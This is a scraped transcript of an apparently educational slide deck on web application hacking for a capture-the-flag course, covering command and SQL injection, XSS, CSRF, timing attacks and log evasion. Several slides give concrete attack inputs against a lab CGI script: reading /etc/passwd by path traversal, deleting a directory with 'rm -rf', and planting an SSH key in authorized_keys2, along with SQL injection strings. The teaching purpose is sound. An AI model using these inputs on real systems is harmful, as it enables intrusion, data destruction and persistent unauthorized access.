Presentation is loading. Please wait.

Presentation is loading. Please wait.

Mike Gerschefske. Hacking is illegal (most of the time)  Understand the laws  Port Scanning can be considered illegal  Post 9/11 can be act of terrorism.

Published bySybil Wright Modified over 9 years ago

Similar presentations

Presentation on theme: "Mike Gerschefske. Hacking is illegal (most of the time)  Understand the laws  Port Scanning can be considered illegal  Post 9/11 can be act of terrorism."— Presentation transcript:

1 Mike Gerschefske

2 Hacking is illegal (most of the time)  Understand the laws  Port Scanning can be considered illegal  Post 9/11 can be act of terrorism  DMCA Exceptions  Educational Learning (Institution)

3 Who cares about web hacking?  The days of buffer overflows and root boxes are nearing an end…  Non executing stacks  People patching their systems  Everything is turning into a web system

4 Power of Google  Google knows all  SSN/Credit Card, backend sql  http://johnny.ihackstuff.com/ghdb.php http://johnny.ihackstuff.com/ghdb.php  intitle:snc-rz30 inurl:home/  Robots.txt  Don’t put secrets in here

5 Power of the web browser  Is capable of HTTP GET/POST  Capable of sending any kind of GET/POST  Doesn’t have to run client side code (ie javascript)  Can send anything it wants to  Can be Bad:  url: http://somesite/index.php?section=Adminhttp://somesite/index.php?section=Admin  Vertical Escalation

6 Bad Code = Bad Security  You are not able to control client end:  Cookies  Do not put User Level (admin, user, etc.)  Vertical Escalation  Do not put user id  Horizontal Escalation  Posts  Gets  Session IDs  All Data

7 The Infamous Museum Example! Command Injection  Tools  Vi  Putty  Puttygen  firefox

8 Museum Example  Code from two [n] years ago:  1 #!/usr/bin/perl  … 7 $first = param('first');  8 $last = param('last');  9 $password = param('password');  10  …  25 if (($first eq "") || ($last eq "") || (! $password eq "unbreakable")) {  26 print " Could not understand or wrong password!! ";  27 }  28 else {  29 system "cat./museum_ideas/${first}.${last}";  …

9 Some Good Combinations Dump the password file: First Name:. Last Name : /../../../../etc/passwd Password : unbreakable Delete the whole directory: First Name: NOTEMPTY Last Name : & rm -rf /home/museum/public_html/cgi_bin/museum_ideas Password : unbreakable

10 SSH RSA Example  Putty GEN  & mkdir /home/museum/.ssh  & echo “ssh-rsa PRIV-KEY“ > /home/museum/.ssh/authorized_keys2  NO SPACES!

11 Museum on Athena!  An Example write-up:  http://athena.uccs.edu/ictf/index.php/Museum

12 Command Injection  This is basic idea of command injection  Security through obscurity sometimes works  Some people are very diligent

13 SQL Injections  We can send commands, why not sql?  What is SQL?  What can we do with SQL?  Get any data we want (that the user has access to)  Delete all the data the user has access to  If user is root, dump database  If user is root, can upload and execute java/c from database and root box

14 Another Example  http://128.198.60.73/~contribute/cgi- bin/history.py http://128.198.60.73/~contribute/cgi- bin/history.py  query = "SELECT * FROM contributors where name=\"%s\" ;" % ( form.getvalue("name") )  " or "1" = "1

15 How to protect against it?  Check parameters  Not really…  Need to do SQL parameterization when at all possible  Mark strings as strings, ints as ints SELECT * WHERE name = @

16 Why doesn’t checking params work?  If you’re really smart it will, but if you don’t understand the problem it wont  This is a very difficult problem to understand  Example:  http://viva/ictf/index.php/SQL_Injection http://viva/ictf/index.php/SQL_Injection  The problem is the ‘ (apostrophe) is a special character  To fix we just find and replace all apostrophe’s with two ‘’ as that’s how we insert apostrophes in a string  NO!

17 Second Level SQL Injection  The problem actually isn’t solved, just more complicated  Take: Username = ' OR 'a' = 'a‘ SELECT * FROM Users WHERE UserName = ''' OR ''a'' = ''a''

18 Goes in fine but coming out…  Get username from DB and put in var  Var contains SQL  We TRUST DB to give us good data  Create another SQL Query and the second one is now vulnerable  SELECT content FROM database WHERE username = VUNSQL

19 XSS – Cross Site Scripting  Malicious injection of JavaScript  Cookie Hi-jacking  MySpace – Replicate itself, add friends  Samy – oh wait, some CSRF too (oops) http://web.archive.org/web/20060208182348/namb.la/ popular/tech.html– http://web.archive.org/web/20060208182348/namb.la/ popular/tech.html document.write(“<img src=http://site.com/a.jpg”);

20 CSRF – XS Request Forgery  Alice Logs into www.bank.com on tab Awww.bank.com  Alice goes to www.google.com which has advertisement that contains JSwww.google.com  Code on Add doc.write(“ ”);

21 Xpath Injection  //user[name/test() = ‘’ or 1=1 or ‘’ and password/text() = ‘junk’]  Used with:  XML RPC  SOAP/WSDL

22 Click Jacking… ……

23 IDS Will Find You  SQL/Command Injection is very easy to detect  IDS poor at packet fragmentation with timing attacks

24 Profiling  Need to know what you’re attacking  Can search for exploits  HEAD / HTTP/1.0 Example  Everyone’s a little different  Nmap is a good profiler  Nessus will profile too

25 Tools  Add N Edit Cookie – Mozilla Firefox extension  Wget  TamperData – FireFox  Modify Headers - FireFox  Curl  Netcat/Telnet  Proxies  Paros Proxy – Free  Fiddler – Microsoft, Free  Spike – Free

26 Timing Attacks  Breaking Authentication  Username and password wrong may take x time while username doesn’t exist takes y time  Successful timing attacks against encryption

27 Never ever ever roll ur own Encryption  Microsoft tried this – FAIL  Tea Party!  ROT13  Base64  MD5

28 ASP.NET Exploit  Debugging (source code) only available to localhost  Bypass this check by sending the following:  GET http://localhost/bleh.asp?a=j HTTP/1.0http://localhost/bleh.asp?a=j  Check’s server name variable rather then remote address

29 Mod_security  http://www.modsecurity.org/

30 Replay Attacks  Socrebot deletes flag  Scorebot adds flag  Since the scorebot goes to everyone we have the delete and add sequence  Can potentially replay same delete sequence across all enemy servers

31 Log Evasion  Many logs only log ~4K of URL  Usually don’t log POST contents  Prevents DOS from filling up logs  If payload at the end of 4k, wont log malicious payload  http://somewhre.com/page.asp?foo=....&payload=MYPAYL OAD http://somewhre.com/page.asp?foo=....&payload=MYPAYL OAD  Application ignores foo parameter  Log shows up as GET /page.asp …  Not just IIS, Sun One App Server

32 OWASP – Top 10! A1 - Cross Site Scripting (XSS) A2 - Injection Flaws A3 - Malicious File Execution A4 - Insecure Direct Object Reference A5 - Cross Site Request Forgery (CSRF) A6 - Information Leakage and Improper Error Handling A7 - Broken Authentication and Session Management A8 - Insecure Cryptographic Storage A9 - Insecure Communications A10 - Failure to Restrict URL Access

Download ppt "Mike Gerschefske. Hacking is illegal (most of the time)  Understand the laws  Port Scanning can be considered illegal  Post 9/11 can be act of terrorism."

Similar presentations

Webgoat.

Webgoat.
Web Security Never, ever, trust user inputs Supankar.

Web Security Never, ever, trust user inputs Supankar.
OWASP’s Ten Most Critical Web Application Security Vulnerabilities

OWASP’s Ten Most Critical Web Application Security Vulnerabilities
Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.

Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.
Don’t get Stung (An introduction to the OWASP Top Ten Project) Barry Dorrans Microsoft Information Security Tools NEW AND IMPROVED!

Don’t get Stung (An introduction to the OWASP Top Ten Project) Barry Dorrans Microsoft Information Security Tools NEW AND IMPROVED!
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
Common Exploits Aaron Cure Cypress Data Defense. SQL Injection.

Common Exploits Aaron Cure Cypress Data Defense. SQL Injection.
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
Web Application Attacks ECE 4112 Fall 2007 Group 9 Zafeer Khan & Simmon Yau.

Web Application Attacks ECE 4112 Fall 2007 Group 9 Zafeer Khan & Simmon Yau.
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
Introduction to Application Penetration Testing

Introduction to Application Penetration Testing
Workshop 3 Web Application Security Li Weichao March 14 2014.

Workshop 3 Web Application Security Li Weichao March

Similar presentations

Ads by Google